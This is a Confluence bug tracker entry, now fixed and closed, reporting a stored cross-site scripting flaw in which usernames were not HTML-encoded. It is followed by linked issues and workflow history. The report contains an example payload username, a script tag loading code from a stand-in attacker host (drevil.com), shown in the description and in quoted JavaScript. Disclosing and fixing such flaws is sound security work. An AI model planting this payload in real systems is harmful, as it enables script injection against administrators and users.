-
Bug
-
Resolution: Fixed
-
High
-
2.2.9, 2.3
-
None
When signing up for an account, it is possible to enter a username like "<script src=http://drevil.com/xss>fred</script>". Confluence will accept this, and on certain pages, render it as raw HTML to the user, opening the possibility of cross-site scripting (XSS) attacks.
Two places I've spotted the raw HTML so far:
- Most prominently, when an admin goes to Manage Users -> Show All Users, and the username displays in the list, the raw HTML is rendered.
- When editing a page created by such a user, the togglePermissions() javascript will display it, breaking later tags:
if ($('edit-personal').checked) $('editPermission').value = "<script src=http://drevil.com/xss>fred</script>";
- causes
-
CONFSERVER-13890 Tooltip showing number of attachments is showing for all items in the Browse menu
-
- Closed
-
- is blocked by
-
CONFSERVER-9627 Velocity does not automatically escape HTML entities when substituting variables
-
- Closed
-
- is related to
-
CONFSERVER-11002 viewuser.action has an XSS problem around username
-
- Closed
-
[CONFSERVER-7615] XSS bug: usernames not HTML-encoded in all places
Workflow | Original: JAC Bug Workflow v3 [ 2887760 ] | New: CONFSERVER Bug Workflow v4 [ 2981478 ] |
Workflow | Original: JAC Bug Workflow v2 [ 2801616 ] | New: JAC Bug Workflow v3 [ 2887760 ] |
Status | Original: Resolved [ 5 ] | New: Closed [ 6 ] |
Workflow | Original: JAC Bug Workflow [ 2732029 ] | New: JAC Bug Workflow v2 [ 2801616 ] |
Workflow | Original: Confluence Workflow - Public Facing - Restricted v5 - TEMP [ 2397321 ] | New: JAC Bug Workflow [ 2732029 ] |
Workflow | Original: Confluence Workflow - Public Facing - Restricted v5 [ 2294508 ] | New: Confluence Workflow - Public Facing - Restricted v5 - TEMP [ 2397321 ] |
Workflow | Original: Confluence Workflow - Public Facing - Restricted v5.1 - TEMP [ 2230918 ] | New: Confluence Workflow - Public Facing - Restricted v5 [ 2294508 ] |
Workflow | Original: Confluence Workflow - Public Facing - Restricted v5 - TEMP [ 2189461 ] | New: Confluence Workflow - Public Facing - Restricted v5.1 - TEMP [ 2230918 ] |
Workflow | Original: Confluence Workflow - Public Facing - Restricted v5 [ 1920070 ] | New: Confluence Workflow - Public Facing - Restricted v5 - TEMP [ 2189461 ] |
Workflow | Original: Confluence Workflow - Public Facing - Restricted v3 [ 1729986 ] | New: Confluence Workflow - Public Facing - Restricted v5 [ 1920070 ] |
Workflow | Original: CONF Bug Subtask WF (TEMP) [ 1686063 ] | New: Confluence Workflow - Public Facing - Restricted v3 [ 1729986 ] |